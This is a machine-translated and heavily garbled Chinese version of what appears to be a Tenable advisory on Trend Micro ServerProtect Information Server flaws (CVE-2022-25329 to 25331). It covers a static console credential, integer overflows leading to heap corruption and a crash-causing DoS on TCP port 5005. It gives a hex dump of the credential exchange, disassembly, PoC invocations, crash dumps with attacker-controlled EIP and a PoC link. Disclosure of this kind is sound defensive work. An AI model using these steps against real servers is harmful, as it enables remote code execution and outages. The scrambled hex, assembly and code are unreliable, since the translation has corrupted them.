Trend Micro ServerProtect多个漏洞
至关重要的剧情简介
在研究cve - 2021 - 36745为Nessus插件覆盖率,站得住脚的发现多个漏洞Trend Micro ServerProtect为Microsoft Windows 1575 /网络操作系统5.8构建。
1)信息服务器静态凭据- cve - 2022 - 25329
(CVSS: 3.1 / AV: N /交流:L /公关:UI: N / N / S: U / C: H /我:H: H)
信息服务器(EarthAgent.exe)使用一个静态的凭据进行身份验证控制台输入命令时2 (CMD_REGISTER)消息是1。未经过身份验证的远程攻击者可以利用这个注册/登录到服务器并执行操作所允许注册/认证客户端控制台。以下Wireshark流捕获显示了一个成功的客户端控制台登记:
87 21 43 65 00000000 02 00 00 00 00 00 00 00 00 00 00 00 ! Ce ..... ........00000010 7 c 01 00 00 e8 03 00 00 00 00 00 00 73 65 72 76 | ....... ....服务公司72 65 72 70 00000020 69 74 65 63 74 5 f 6 e 66 6 f 5 f 73 erprotec t_info_s 79 65 72 76 65 72 2 e 70 00000030 00 00 00 00 00 00 00 00 erv。py ........00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........00000060 e8 03 21 43 00 00 00 00 00 00 00 52 00 00 ........ 59.C.R.Y !54 00000070 50 00 00 00 21日30 31日00 00 38 43 37 00 00 00 p !。1。0.8.7.C。38 00000080 00 41 38 42 34 35 00 00 00 00 00 42 a.8.5 45 00 00 8.。 4.B.B.E. 00000090 38 00 38 00 44 00 33 00 45 00 35 00 35 00 34 00 8.8.D.3. E.5.5.4. 000000A0 37 00 33 00 36 00 46 00 33 00 39 00 00 00 00 00 7.3.6.F. 3.9..... 000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 000000F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000170 00 00 0c 00 00 00 00 00 00 00 00 00 ........ .... 00000000 21 43 65 87 02 00 00 00 00 00 00 00 00 00 00 00 !Ce..... ........ 00000010 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000020 c8 25 75 00 00 00 00 00 a0 ae 0c 01 00 00 00 00 .%u..... ........ 00000030 00 00 00 00 fc bc 0c 01 60 01 00 00 03 00 00 00 ........ `....... 00000040 63 ab 5c 60 82 10 00 00 fc bc 0c 01 6e ab 5c 60 c.\`.... ....n.\` 00000050 40 fe 6b 00 00 00 00 00 04 84 00 00 cc 04 00 00 @.k..... ........ 00000060 00 00 0c 01 60 01 00 00 a4 fd aa 02 a0 ae 0c 01 ....`... ........ 00000070 10 fd 6b 00 5e d3 2c 77 04 84 00 00 5e d3 2c 77 ..k.^.,w ....^.,w 00000080 00 00 00 00 ....
2)Information Server命令73730整数溢出- cve - 2022 - 25330
(CVSS: 3.1 / AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:H: H)
命令73730发送到信息服务器的TCP端口5005是用来获得正常的列表服务器远程Windows主机上通过查询远程注册表键下HKLM \ SOFTWARE \ WOW6432Node \ \ ServerProtect \ CurrentVersion趋势\ InformationServer \ <域> \ < normal_server_name >。命令指定远程主机的主机名/ IP,远程主机使用的凭证,和正常的服务器检索的最大数量。该命令有以下形式:
/ / le32 = 32位整数小端字节格式结构标题{le32魔法;/ /必须是0 x87654321 le32 cmd;/ /命令le32错误;/ /错误代码被用于响应le32 unk;/ / num le32 len的物品;/ /消息长度包括这个头le32 cport;/ /控制台端口,用于客户端IP识别/ /客户端控制台字节unk [4];};struct cmd_73730{头hdr;/ / hdr。cmd must be 73730 byte rhost[56]; // remote Windows host byte username[128]; // credentials to access the byte password[128]; // registry on the remote host le32 max_cnt; // max number of Normal Servers to get };
一个整数溢出EarthAgent时存在。exe使用attacker-supplied max_cnt分配堆内存存储数据从注册表中检索命令中指定的主机:
EarthAgent。exe 5.80.0.1575 <剪断…>。text: 004321 d3 lea edx, esp + 2课时+ arg_hdr。max_cnt]。text: 004321 da推动ebx。text: 004321 db推动edx。text: 004321直流推73730。text: 004321 e1 mov连成一片,esi。text: 004321 e3叫obj30_RetrieveDataFromBuffer;返回真正的/假。text: 004321 e8测试eax, eax。text: 004321 ea生理loc_4324D0。text: 004321 f0 mov eax, esp + 2 a4h + arg_hdr。max_cnt];attacker-controlled。text: 004321 f7 lea连成一片,ds: 0 (eax * 8)。text: 004321铁子连成一片,eax。text: 00432200连成一片,3;max_cnt * 56 - > int32溢出!。text: 00432203推连成一片。text: 00432204电话操作符新(单位)<剪…>
一个大型max_cnt(即。,0 x04924925)会产生一堆缓冲的大小(即。(0 x04924925 * 56) & 0 xffffffff = 0 x18)。
当利用漏洞1),未经过身份验证的远程攻击者可以指定他/她自己的Windows主机,凭证访问它,和一个大max_cnt 73730年命令并将其发送到ServerProtect信息服务器主机的TCP端口5005。这可能会导致出现基于堆的缓冲区溢出EarthAgent。exe大量attacker-controlled正常服务器名称从远程注册表可以复制到小型堆缓冲区。这可能会导致终止或远程代码执行过程。
POC:
python3 serverprotect_info_server_cmd_73730_int32_overflow。py - t <目标> 5005 - p - p < admin_password >——< attacker-win-host > - u管理员注册客户端控制台可以发送73730年精雕细琢命令消息回溯(最近的电话最后):文件“/ / / serverprotect_info_server_cmd_73730_int32_overflow 0天。py”, 119行,在<模块> r = read_msg (s)文件”/工作/ / serverprotect_info_server_cmd_73730_int32_overflow 0天。py”,第40行,read_msg味精= recv_msg(袜子)文件“/工作/ / serverprotect_info_server_cmd_73730_int32_overflow 0天。py”,行22日recv_msg data = recvall(袜子,0 x1c)文件“/工作/ / serverprotect_info_server_cmd_73730_int32_overflow 0天。py”第12行,recvall包=袜子。recv (n - len(数据))ConnectionResetError: [Errno 104]通过对等连接重置
下了一堆堆的腐败导致缓冲区溢出:
(1 e60.ee8):访问违例-代码c0000005(第一次)第一次异常报告任何异常处理之前。这个异常可能是预期和处理。eax = 41414141 ebx = 010 b35e0连成一片= 00004141 edx = 00004141 esi = 00004141 edi = 010 b0000 eip = 772 ceb37 esp = 0356 f7fc ebp = 0356 f9bc iopl = 0 nv了ei pl新西兰ac pe数控c = 0023 ss = 002 b d = 002 b es = 002 fs = 0053 gs = 002 b英语= 00010216 ntdll !RtlpAllocateHeap + 0 x397: 772 ceb37 8 b12 mov edx, dword ptr [edx] ds: 002 b: 41414141 = ? ? ? ? ? ? ? ?0:017 > k # ChildEBP RetAddr 00 0356 f9bc 772 ce5f0 ntdll !RtlpAllocateHeap + 0 x397 01 0356 fa60 772 cd35e ntdll !RtlpAllocateHeapInternal + 0 x1280 02 0356 771 fa7c f87c0 ntdll !RtlAllocateHeap + 0 x3e 03 0356 fa9c 009 b38d6 msvcrt !malloc + 0 x90警告:堆栈解除信息不可用。后帧可能是错误的。0356年04 fab4 00 a068d1 MFC42u !Ordinal823 + 0 x17 05年00000000 00000000 MFC42u ! Ordinal6135 + 0×
3)Information Server命令36885整数溢出- cve - 2022 - 25330
(CVSS: 3.1 / AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:H: H)
存在于EarthAgent整数溢出条件。exe当处理一个命令36885消息。当利用漏洞1),未经过身份验证的远程攻击者可以或可能实现远程代码执行过程通过发送一个专门制作的命令36885消息TCP端口5005。
以下显示了漏洞:
EarthAgent。exe 5.80.0.1575 <剪断…>。text: 0042 caa2添加eax, 760 h;attacker-controlled eax。text: 0042 caa2;int32溢出如果eax = 0 xfffff8a0。text: 0042 caa7 cmp eax, 989680 h。text: 0042年中国民航mov dword ptr esp + 11 b8h + allocSize, eax。text: 0042 cab0 ja loc_42CBFA。text: 0042 cab6推动eax。text: 0042 cab7电话操作符新(使用uint)。text: 0042课程mov ebx eax;int32溢出- >小堆缓冲区。text: 0042课程;分配。text: 0042凯布加esp, 4。text: 0042 cac1测试ebx, ebx。text: 0042 cac3生理loc_42CBFA。text: 0042 cac9 mov连成一片,dword ptr [esp + 11 b8h + allocSize]。text: 0042 cacd xor eax, eax。text: 0042件mov edx,连成一片。text: 0042 cad 1 mov edi, ebx。text: 0042 cad 3月连成一片,2。text: 0042 cad 6代表stosd。text: 0042 cad 8 mov连成一片,edx。text:每0042 x768 0字节复制到小。text: 0042每堆缓冲- >堆腐败。text: 0042每远端控制设备可能吗?。text: 0042每把768 h。text: 0042 cadf连成一片,3。text: 0042 cae2代表stosb。text: 0042 cae4 lea eax, (esp + 11 bch + Src);0 xc4字节的来源。text: 0042 cae4;attacker-controlled。text: 0042 caeb推动eax。text: 0042 caec推动ebx。text: 0042 ca ds: memmove <剪…>
POC:
python3 serverprotect_info_server_dos。py - t <目标> - p 5005 - c 36885连接1注册客户端控制台可以发送36885年精雕细琢命令消息连接2注册客户端控制台可以发送36885年精雕细琢命令消息连接3回溯(最近的电话最后):文件“/ / / serverprotect_info_server_dos 0天。py”, 144行,在<模块> r = read_msg (s)文件”/工作/ / serverprotect_info_server_dos 0天。py”,第40行,read_msg味精= recv_msg(袜子)文件“/工作/ / serverprotect_info_server_dos 0天。py”,行22日recv_msg data = recvall(袜子,0 x1c)文件“/工作/ / serverprotect_info_server_dos 0天。py”第12行,recvall包=袜子。recv (n - len(数据))ConnectionResetError: [Errno 104]通过对等连接重置
下了一堆堆的腐败导致缓冲区溢出:
0:015 > g (6 bc.1f60): c++呃例外——代码e06d7363(第一次)(6 bc.1f60):访问违例——代码c0000005(第一次)第一次异常报告任何异常处理之前。这个异常可能是预期和处理。eax = 011645 f0 ebx = 00000000连成一片= 00000000 edx = 00000000 esi = 41414141 edi = 02 a1f848 eip = 41414141 esp = 02 a1f61c ebp = 02 a1f648 iopl = 0 nv了ei pl zr na pe数控c = 0023 ss = 002 b d = 002 b es = 002 fs = 0053 gs = 002 b英语= 00010246 41414141 ? ?? ? ?0:005 > k # ChildEBP RetAddr警告:帧IP没有任何已知的模块。后帧可能是错误的。00 02 a1f618 771 eb826 0 x41414141 01 02 a1f648 771 eb7e5 msvcrt !终止+ 0 x26 02年02 a1f678 771 eaf94 msvcrt !_inconsistency + 0 x2c 03 02 a1f6d4 771 eb5b8 msvcrt !FindHandler + 0 x3db 04 02 a1f708 771 ec1b6 msvcrt !__InternalCxxFrameHandler + 0 xf7 05年02 a1f744 77316482 msvcrt !__CxxFrameHandler + 0 x26 06年02 a1f768 77316454 ntdll !ExecuteHandler2 + 0 x26 07年02 a1f830 77303 a06 ntdll !ExecuteHandler + 0 x24 08年02 a1f830 74 a335e2 ntdll !KiUserExceptionDispatcher + 0 x26 09年02 a1fd54 771 eb8f8 KERNELBASE !RaiseException + 0 x62 0 02 a1fd98 00 a31401 msvcrt !_CxxThrowException+0x68 0b 02a1fdac 00a38831 MFC42u!Ordinal1259 0c 02a1fdb0 00a38858 MFC42u!Ordinal1198+0x5 0d 02a1fdc8 004164e3 MFC42u!Ordinal1167+0x24 0e 02a1fe98 74a21e76 EarthAgent+0x164e3 0f 02a1fec0 ffffffff KERNELBASE!CloseHandle+0x26 10 02a1ff30 77217e71 0xffffffff 11 02a1ff68 77217f31 msvcrt!_callthreadstartex+0x25 12 02a1ff70 75190419 msvcrt!_threadstartex+0x61 13 02a1ff80 772f72fd KERNEL32!BaseThreadInitThunk+0x19 14 02a1ffdc 772f72cd ntdll!__RtlUserThreadStart+0x2f 15 02a1ffec 00000000 ntdll!_RtlUserThreadStart+0x1b
4)Information Server命令DoS - cve - 2022 - 25331
(CVSS: 3.1 / AV: N /交流:L /公关:L / UI: N / S: U / C: N /我:N / A: H)
未捕获的异常可以生成c++ EarthAgent新运营商。exe当分配规模很大。当利用漏洞1),未经过身份验证的远程攻击者可以崩溃过程通过发送一个精雕细琢命令消息TCP端口5005。
以下命令的影响:4098、8221、8222,8226,12308,12309,36867,36869,36898,41010,41014,65549。
以下显示了脆弱性影响命令4098:
EarthAgent。exe 5.80.0.1575 <剪断…>。text: 00423579 lea连成一片,ds: 0 [eax * 8]。text: 00423580 mov [esp + 64 ch + arg_hdr。max_cnt], eax。text: 00423587子连成一片,eax。text: 00423589连成一片,3;56 x。text: 0042358 c推动连成一片;attacker-controlled分配大小、。text: 0042358 c;未处理的异常DoS。text: 0042358 d的电话操作符新(单位)<剪…>
POC:
python3 serverprotect_info_server_dos。py - t <目标> - p 5005 - c 4098连接1注册客户端控制台可以发送4098年精雕细琢命令消息连接2注册客户端控制台可以发送4098年精雕细琢命令消息连接3注册客户端控制台可以发送4098年精雕细琢命令消息连接4回溯(最近的电话最后):文件“/ / / serverprotect_info_server_dos 0天。py”, 144行,在<模块> r = read_msg (s)文件”/工作/ / serverprotect_info_server_dos 0天。py”,第40行,read_msg味精= recv_msg(袜子)文件“/工作/ / serverprotect_info_server_dos 0天。py”,行22日recv_msg data = recvall(袜子,0 x1c)文件“/工作/ / serverprotect_info_server_dos 0天。py”第12行,recvall包=袜子。recv (n - len(数据))ConnectionResetError: [Errno 104]通过对等连接重置
看到serverprotect_info_server_dos POC脚本。py联系详情。
解决方案
概念验证
https://github.com/tenable/poc/blob/master/TrendMicro/ServerProtect/serverprotect_info_server_dos.py